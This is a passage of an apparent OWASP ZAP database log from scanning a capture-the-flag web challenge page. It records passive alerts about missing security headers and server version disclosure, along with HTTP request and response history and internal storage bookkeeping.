attacks.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','x-frame-options','','Modern Web browsers support the Content-Security-Policy and X-Frame-Options HTTP headers. Ensure one of them is set on all web pages returned by your site/app.\u000aIf you expect the page to be framed only by pages on your server (e.g. it''s part of a FRAMESET) then you''ll want to use SAMEORIGIN, otherwise if you never expect the page to be framed, you should use DENY. Alternatively consider implementing Content Security Policy''s "frame-ancestors" directive.','https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options',27,27,'','',1021,15,3,'','10020-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(89,43,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(90,43,'WSTG-v42-CLNT-09','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/11-Client-side_Testing/09-Testing_for_Clickjacking') -COMMIT -INSERT INTO ALERT_TAG VALUES(91,43,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(84,630,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 85 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=83 -INSERT INTO BLOCKS VALUES(83,1,0) -INSERT INTO BLOCKS VALUES(84,2147483563,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=83 -INSERT INTO LOBS VALUES(83,1,0,84) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(84,1,'2024-03-02 03:37:49.436000',1,84,NULL,630,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=84 -INSERT INTO LOB_IDS VALUES(84,630,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(44,0,10015,'Re-examine Cache-control Directives',0,1,'The cache-control header has not been set properly or is missing, allowing the browser and proxies to cache content. For static assets like css, js, or image files this might be intended, however, the resources should be reviewed to ensure that no sensitive content will be cached.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','cache-control','','For secure content, ensure the cache-control HTTP header is set with "no-cache, no-store, must-revalidate". If an asset should be cached consider setting the directives "public, max-age, immutable".','https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html#web-content-caching\u000ahttps://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Cache-Control\u000ahttps://grayduck.mn/2021/09/13/cache-control-recommendations/',27,27,'','no-store',525,13,3,'','10015') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(92,44,'WSTG-v42-ATHN-06','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/04-Authentication_Testing/06-Testing_for_Browser_Cache_Weaknesses') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(85,635,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 86 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=84 -INSERT INTO BLOCKS VALUES(84,1,0) -INSERT INTO BLOCKS VALUES(85,2147483562,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=84 -INSERT INTO LOBS VALUES(84,1,0,85) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(85,1,'2024-03-02 03:37:49.459000',1,85,NULL,635,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=85 -INSERT INTO LOB_IDS VALUES(85,635,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(45,0,10038,'Content Security Policy (CSP) Header Not Set',2,3,'Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.','https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy\u000ahttps://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html\u000ahttps://www.w3.org/TR/CSP/\u000ahttps://w3c.github.io/webappsec-csp/\u000ahttps://web.dev/articles/csp\u000ahttps://caniuse.com/#feat=contentsecuritypolicy\u000ahttps://content-security-policy.com/',27,27,'','',693,15,3,'','10038-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(93,45,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(94,45,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(86,625,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 87 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=85 -INSERT INTO BLOCKS VALUES(85,1,0) -INSERT INTO BLOCKS VALUES(86,2147483561,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=85 -INSERT INTO LOBS VALUES(85,1,0,86) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(86,1,'2024-03-02 03:37:49.464000',1,86,NULL,625,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=86 -INSERT INTO LOB_IDS VALUES(86,625,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(46,0,10109,'Modern Web Application',0,2,'The application appears to be a modern web application. If you need to explore it automatically then the Ajax Spider may well be more effective than the standard one.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','No links have been found while there are scripts, which is an indication that this is a modern web application.','This is an informational alert and so no changes are required.','',27,27,'','',-1,-1,3,'','10109') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(87,612,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 88 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=86 -INSERT INTO BLOCKS VALUES(86,1,0) -INSERT INTO BLOCKS VALUES(87,2147483560,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=86 -INSERT INTO LOBS VALUES(86,1,0,87) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(87,1,'2024-03-02 03:37:49.486000',1,87,NULL,612,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=87 -INSERT INTO LOB_IDS VALUES(87,612,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(47,0,10036,'Server Leaks Version Information via "Server" HTTP Response Header Field',1,3,'The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.','https://httpd.apache.org/docs/current/mod/core.html#servertokens\u000ahttps://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)\u000ahttps://www.troyhunt.com/shhh-dont-let-your-response-headers/',27,27,'','nginx/1.24.0',200,13,3,'','10036') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(95,47,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(96,47,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -INSERT INTO ALERT_TAG VALUES(97,47,'WSTG-v42-INFO-02','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(88,652,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 89 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=87 -INSERT INTO BLOCKS VALUES(87,1,0) -INSERT INTO BLOCKS VALUES(88,2147483559,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=87 -INSERT INTO LOBS VALUES(87,1,0,88) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(88,1,'2024-03-02 03:37:49.514000',1,88,NULL,652,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=88 -INSERT INTO LOB_IDS VALUES(88,652,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(48,0,10035,'Strict-Transport-Security Header Not Set',1,3,'HTTP Strict Transport Security (HSTS) is a web security policy mechanism whereby a web server declares that complying user agents (such as a web browser) are to interact with it using only secure HTTPS connections (i.e. HTTP layered over TLS/SSL). HSTS is an IETF standards track protocol and is specified in RFC 6797.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to enforce Strict-Transport-Security.','https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Strict_Transport_Security_Cheat_Sheet.html\u000ahttps://owasp.org/www-community/Security_Headers\u000ahttps://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security\u000ahttps://caniuse.com/stricttransportsecurity\u000ahttps://datatracker.ietf.org/doc/html/rfc6797',27,27,'','',319,15,3,'','10035-1') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(98,48,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(99,48,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(89,618,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 90 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=88 -INSERT INTO BLOCKS VALUES(88,1,0) -INSERT INTO BLOCKS VALUES(89,2147483558,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=88 -INSERT INTO LOBS VALUES(88,1,0,89) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(89,1,'2024-03-02 03:37:49.518000',1,89,NULL,618,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=89 -INSERT INTO LOB_IDS VALUES(89,618,1,40) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(49,0,10021,'X-Content-Type-Options Header Missing',1,2,'The Anti-MIME-Sniffing header X-Content-Type-Options was not set to ''nosniff''. This allows older versions of Internet Explorer and Chrome to perform MIME-sniffing on the response body, potentially causing the response body to be interpreted and displayed as a content type other than the declared content type. Current (early 2014) and legacy versions of Firefox will use the declared content type (if one is set), rather than performing MIME-sniffing.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','x-content-type-options','This issue still applies to error type pages (401, 403, 500, etc.) as those pages are often still affected by injection issues, in which case there is still concern for browsers sniffing pages away from their actual content type.\u000aAt "High" threshold this scan rule will not alert on client or server error responses.','Ensure that the application/web server sets the Content-Type header appropriately, and that it sets the X-Content-Type-Options header to ''nosniff'' for all web pages.\u000aIf possible, ensure that the end user uses a standards-compliant and modern web browser that does not perform MIME-sniffing at all, or that can be directed by the web application/web server to not perform MIME-sniffing.','https://learn.microsoft.com/en-us/previous-versions/windows/internet-explorer/ie-developer/compatibility/gg622941(v=vs.85)\u000ahttps://owasp.org/www-community/Security_Headers',27,27,'','',693,15,3,'','10021') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(100,49,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(101,49,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(90,639,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 91 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=89 -INSERT INTO BLOCKS VALUES(89,1,0) -INSERT INTO BLOCKS VALUES(90,2147483557,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=89 -INSERT INTO LOBS VALUES(89,1,0,90) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(90,1,'2024-03-02 03:37:49.522000',1,90,NULL,639,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=90 -INSERT INTO LOB_IDS VALUES(90,639,1,40) -COMMIT -/*C8*/SET SCHEMA PUBLIC -INSERT INTO TAG VALUES(1,27,'Script') -COMMIT -INSERT INTO TAG VALUES(2,27,'Comment') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(91,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 92 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=90 -INSERT INTO BLOCKS VALUES(90,1,0) -INSERT INTO BLOCKS VALUES(91,2147483556,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=90 -INSERT INTO LOBS VALUES(90,1,0,91) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(91,1,'2024-03-02 03:37:59.053000',1,91,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=91 -INSERT INTO LOB_IDS VALUES(91,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(92,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 93 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=91 -INSERT INTO BLOCKS VALUES(91,1,0) -INSERT INTO BLOCKS VALUES(92,2147483555,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=91 -INSERT INTO LOBS VALUES(91,1,0,92) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(92,1,'2024-03-02 03:38:09.054000',1,92,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=92 -INSERT INTO LOB_IDS VALUES(92,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(93,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 94 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=92 -INSERT INTO BLOCKS VALUES(92,1,0) -INSERT INTO BLOCKS VALUES(93,2147483554,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=92 -INSERT INTO LOBS VALUES(92,1,0,93) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(93,1,'2024-03-02 03:38:19.056000',1,93,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=93 -INSERT INTO LOB_IDS VALUES(93,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(94,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 95 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=93 -INSERT INTO BLOCKS VALUES(93,1,0) -INSERT INTO BLOCKS VALUES(94,2147483553,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=93 -INSERT INTO LOBS VALUES(93,1,0,94) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(94,1,'2024-03-02 03:38:29.059000',1,94,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=94 -INSERT INTO LOB_IDS VALUES(94,64,1,40) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(95,64,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 96 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=94 -INSERT INTO BLOCKS VALUES(94,1,0) -INSERT INTO BLOCKS VALUES(95,2147483552,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=94 -INSERT INTO LOBS VALUES(94,1,0,95) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(95,1,'2024-03-02 03:38:39.059000',1,95,NULL,64,TRUE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=95 -INSERT INTO LOB_IDS VALUES(95,64,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(28,1709346750724,1,403,1709347121300,30,'GET','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html HTTP/1.1\u000d\u000ahost: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aConnection: keep-alive\u000d\u000aUpgrade-Insecure-Requests: 1\u000d\u000aSec-Fetch-Dest: document\u000d\u000aSec-Fetch-Mode: navigate\u000d\u000aSec-Fetch-Site: none\u000d\u000aSec-Fetch-User: ?1\u000d\u000a\u000d\u000a','','HTTP/1.1 403 Forbidden\u000d\u000aServer: nginx/1.24.0\u000d\u000aDate: Sat, 02 Mar 2024 02:38:41 GMT\u000d\u000aContent-Type: text/html\u000d\u000aContent-Length: 384\u000d\u000aConnection: keep-alive\u000d\u000aETag: "1-180"\u000d\u000a\u000d\u000a','3c68746d6c3e0a3c686561643e0a202020203c7469746c653e496e74726f20746f2057656220323c2f7469746c653e0a202020203c6d65746120636861727365743d225554462d38223e0a202020203c6c696e6b2072656c3d227374796c6573686565742220747970653d22746578742f6373732220687265663d227374796c652e63737322202f3e0a3c2f686561643e0a3c626f64793e0a3c68313e24284745524d414e5f4349545929205472616d205469636b6574204d616368696e653c2f68313e0a0a3c68333e3c7370616e207374796c653d22636f6c6f723a20726564223e496e736563757265206f7065726174696e672073797374656d213c2f7370616e3e3c2f68333e0a3c68723e0a466f7220734563557249745920724561536f4e732c20796f75206e65656420746f2075706461746520796f75722073797374656d20746f2057696e646f7773203935206265666f726520616363657373696e6720746869732077656273697465210a3c2f626f64793e0a3c2f68746d6c3e',NULL,'',TRUE) -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(96,354,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 97 -COMMIT -DELETE FROM BLOCKS WHERE BLOCK_ADDR=95 -INSERT INTO BLOCKS VALUES(95,1,0) -INSERT INTO BLOCKS VALUES(96,2147483551,0) -DELETE FROM BLOCKS WHERE BLOCK_ADDR=95 -INSERT INTO LOBS VALUES(95,1,0,96) -COMMIT -/*C13*/SET SCHEMA PUBLIC -INSERT INTO WEBSOCKET_MESSAGE VALUES(96,1,'2024-03-02 03:38:41.333000',1,96,NULL,354,FALSE) -SET SCHEMA SYSTEM_LOBS -DELETE FROM LOB_IDS WHERE LOB_ID=96 -INSERT INTO LOB_IDS VALUES(96,354,1,40) -COMMIT -/*C3*/INSERT INTO HISTORY VALUES(29,1709346750724,1,200,1709347121392,40,'GET','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css HTTP/1.1\u000d\u000ahost: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337\u000d\u000aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0\u000d\u000aAccept: text/css,*/*;q=0.1\u000d\u000aAccept-Language: en-US,en;q=0.5\u000d\u000aConnection: keep-alive\u000d\u000aReferer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html\u000d\u000aSec-Fetch-Dest: style\u000d\u000aSec-Fetch-Mode: no-cors\u000d\u000aSec-Fetch-Site: same-origin\u000d\u000a\u000d\u000a','','HTTP/1.1 200 OK\u000d\u000aServer: nginx/1.24.0\u000d\u000aDate: Sat, 02 Mar 2024 02:38:41 GMT\u000d\u000aContent-Type: text/plain\u000d\u000aContent-Length: 287\u000d\u000aLast-Modified: Thu, 01 Jan 1970 00:00:01 GMT\u000d\u000aConnection: keep-alive\u000d\u000aETag: "1-11f"\u000d\u000aCache-Control: no-store\u000d\u000aAccept-Ranges: bytes\u000d\u000a\u000d\u000a','68746d6c207b0a202020206d61782d77696474683a20373063683b0a2020202070616464696e673a2033656d2031656d3b0a202020206d617267696e3a206175746f3b0a202020206c696e652d6865696768743a20312e37353b0a20202020666f6e742d73697a653a20312e3235656d3b0a0a202020206261636b67726f756e642d636f6c6f723a20233145323132323b0a20202020636f6c6f723a20234244423741463b0a7d0a68312c2068322c206833207b0a20202020636f6c6f723a20234538453645333b0a7d0a6872207b0a202020206d617267696e2d746f703a202d31656d3b0a7d0a61207b0a20202020636f6c6f723a206c69676874626c75653b0a20202020746578742d6465636f726174696f6e3a206e6f6e653b0a7d0a',NULL,'',TRUE) -COMMIT -/*C5*/INSERT INTO ALERT VALUES(50,0,10036,'Server Leaks Version Information via "Server" HTTP Response Header Field',1,3,'The web/application server is leaking version information via the "Server" HTTP response header. Access to such information may facilitate attackers identifying other vulnerabilities your web/application server is subject to.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/style.css','','','Ensure that your web server, application server, load balancer, etc. is configured to suppress the "Server" header or provide generic details.','https://httpd.apache.org/docs/current/mod/core.html#servertokens\u000ahttps://learn.microsoft.com/en-us/previous-versions/msp-n-p/ff648552(v=pandp.10)\u000ahttps://www.troyhunt.com/shhh-dont-let-your-response-headers/',29,29,'','nginx/1.24.0',200,13,3,'','10036') -COMMIT -/*C6*/INSERT INTO ALERT_TAG VALUES(102,50,'OWASP_2021_A05','https://owasp.org/Top10/A05_2021-Security_Misconfiguration/') -COMMIT -INSERT INTO ALERT_TAG VALUES(103,50,'OWASP_2017_A06','https://owasp.org/www-project-top-ten/2017/A6_2017-Security_Misconfiguration.html') -COMMIT -INSERT INTO ALERT_TAG VALUES(104,50,'WSTG-v42-INFO-02','https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/01-Information_Gathering/02-Fingerprint_Web_Server') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=9 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Server' AND USED=3 AND FLAGS='' AND VALS='nginx/1.24.0' -INSERT INTO PARAM VALUES(9,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Server',4,'','nginx/1.24.0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=10 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Date' AND USED=3 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:37:48 GMT' -INSERT INTO PARAM VALUES(10,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Date',4,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:38:41 GMT,Sat%2C 02 Mar 2024 02:37:48 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=11 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Type' AND USED=3 AND FLAGS='' AND VALS='text/html,text/plain' -INSERT INTO PARAM VALUES(11,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Type',4,'','text/html,text/plain') -COMMIT -DELETE FROM PARAM WHERE PARAMID=12 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Length' AND USED=3 AND FLAGS='' AND VALS='287,1366,384' -INSERT INTO PARAM VALUES(12,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Length',4,'','287,1366,384') -COMMIT -DELETE FROM PARAM WHERE PARAMID=13 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Connection' AND USED=3 AND FLAGS='' AND VALS='keep-alive' -INSERT INTO PARAM VALUES(13,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Connection',4,'','keep-alive') -COMMIT -DELETE FROM PARAM WHERE PARAMID=14 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='ETag' AND USED=3 AND FLAGS='' AND VALS='"1-180","1-11f","1-556"' -INSERT INTO PARAM VALUES(14,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','ETag',4,'','"1-180","1-11f","1-556"') -COMMIT -DELETE FROM PARAM WHERE PARAMID=9 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Server' AND USED=4 AND FLAGS='' AND VALS='nginx/1.24.0' -INSERT INTO PARAM VALUES(9,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Server',5,'','nginx/1.24.0') -COMMIT -DELETE FROM PARAM WHERE PARAMID=10 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Date' AND USED=4 AND FLAGS='' AND VALS='Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:38:41 GMT,Sat%2C 02 Mar 2024 02:37:48 GMT' -INSERT INTO PARAM VALUES(10,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Date',5,'','Sat%2C 02 Mar 2024 02:34:56 GMT,Sat%2C 02 Mar 2024 02:38:41 GMT,Sat%2C 02 Mar 2024 02:37:48 GMT') -COMMIT -DELETE FROM PARAM WHERE PARAMID=11 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Type' AND USED=4 AND FLAGS='' AND VALS='text/html,text/plain' -INSERT INTO PARAM VALUES(11,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Type',5,'','text/html,text/plain') -COMMIT -/*C5*/INSERT INTO ALERT VALUES(51,0,10038,'Content Security Policy (CSP) Header Not Set',2,3,'Content Security Policy (CSP) is an added layer of security that helps to detect and mitigate certain types of attacks, including Cross Site Scripting (XSS) and data injection attacks. These attacks are used for everything from data theft to site defacement or distribution of malware. CSP provides a set of standard HTTP headers that allow website owners to declare approved sources of content that browsers should be allowed to load on that page \u2014 covered types are JavaScript, CSS, HTML frames, fonts, images and embeddable objects such as Java applets, ActiveX, audio and video files.','https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/tram-ticket-machine.html','','','Ensure that your web server, application server, load balancer, etc. is configured to set the Content-Security-Policy header.','https://developer.mozilla.org/en-US/docs/Web/Security/CSP/Introducing_Content_Security_Policy\u000ahttps://cheatsheetseries.owasp.org/cheatsheets/Content_Security_Policy_Cheat_Sheet.html\u000ahttps://www.w3.org/TR/CSP/\u000ahttps://w3c.github.io/webappsec-csp/\u000ahttps://web.dev/articles/csp\u000ahttps://caniuse.com/#feat=contentsecuritypolicy\u000ahttps://content-security-policy.com/',28,28,'','',693,15,3,'','10038-1') -COMMIT -/*C10*/DELETE FROM PARAM WHERE PARAMID=12 AND SITE='722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337' AND TYPE='header' AND NAME='Content-Length' AND USED=4 AND FLAGS='' AND VALS='287,1366,384' -INSERT INTO PARAM VALUES(12,'722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337','header','Content-Length',5,'','287,1366,384') -COMMIT -/*C1*/INSERT INTO LOB_IDS VALUES(97,339,0,40) -ALTER SEQUENCE SYSTEM_LOBS.LOB_ID RESTART WITH 98 -COMMIT -DELETE FROM BLOCKS WHERE 